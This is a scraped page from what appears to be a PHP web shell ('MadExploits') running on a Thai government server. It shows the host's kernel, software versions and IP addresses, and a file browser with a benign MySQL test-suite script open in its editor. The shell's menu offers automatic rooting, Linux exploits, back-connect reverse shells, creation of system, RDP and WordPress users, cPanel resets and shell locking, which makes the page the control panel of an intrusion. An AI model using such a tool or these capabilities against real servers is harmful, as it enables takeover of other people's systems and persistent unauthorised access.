Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
funcs_1 /
storedproc /
[ HOME SHELL ]
Name
Size
Permission
Action
cleanup_sp_tb.inc
351
B
-rw-r--r--
load_sp_tb.inc
3.56
KB
-rw-r--r--
param_check.inc
1.8
KB
-rw-r--r--
storedproc_02.inc
48.7
KB
-rw-r--r--
storedproc_03.inc
17.56
KB
-rw-r--r--
storedproc_06.inc
12.76
KB
-rw-r--r--
storedproc_07.inc
3.49
KB
-rw-r--r--
storedproc_08.inc
5.07
KB
-rw-r--r--
storedproc_08_show.inc
681
B
-rw-r--r--
storedproc_10.inc
9.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load_sp_tb.inc
--echo --echo --source suite/funcs_1/storedproc/load_sp_tb.inc --echo -------------------------------------------------------------------------------- # ============================================================================== # # This load script can be called multiple times inside a test script because it # first cleans up all objects that will be created. # Therefore the same script is used as it will be used at the end of a test. # # ============================================================================== --disable_abort_on_error --enable_query_log # use the same .inc to cleanup before and after the test --source suite/funcs_1/storedproc/cleanup_sp_tb.inc CREATE DATABASE db_storedproc; CREATE DATABASE db_storedproc_1; USE db_storedproc; --replace_result $engine_type <engine_to_be_tested> eval create table t1(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t4.txt' into table t1; --replace_result $engine_type <engine_to_be_tested> eval create table t2(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t4.txt' into table t2; --replace_result $engine_type <engine_to_be_tested> eval create table t3(f1 char(20),f2 char(20),f3 integer) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t3.txt' into table t3; --replace_result $engine_type <engine_to_be_tested> eval create table t4(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t4.txt' into table t4; USE db_storedproc_1; --replace_result $engine_type <engine_to_be_tested> eval create table t6(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t4.txt' into table t6; USE db_storedproc; --replace_result $engine_type <engine_to_be_tested> eval create table t7 (f1 char(20), f2 char(25), f3 date, f4 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t7.txt' into table t7; --replace_result $engine_type <engine_to_be_tested> eval create table t8 (f1 char(20), f2 char(25), f3 date, f4 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t7.txt' into table t8; --replace_result $engine_type <engine_to_be_tested> eval create table t9(f1 int, f2 char(25), f3 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t9.txt' into table t9; --replace_result $engine_type <engine_to_be_tested> eval create table t10(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t4.txt' into table t10; --replace_result $engine_type <engine_to_be_tested> eval create table t11(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = $engine_type; --replace_result $MYSQLTEST_VARDIR <MYSQLTEST_VARDIR> eval load data infile '$MYSQLTEST_VARDIR/std_data/funcs_1/t4.txt' into table t11;
Close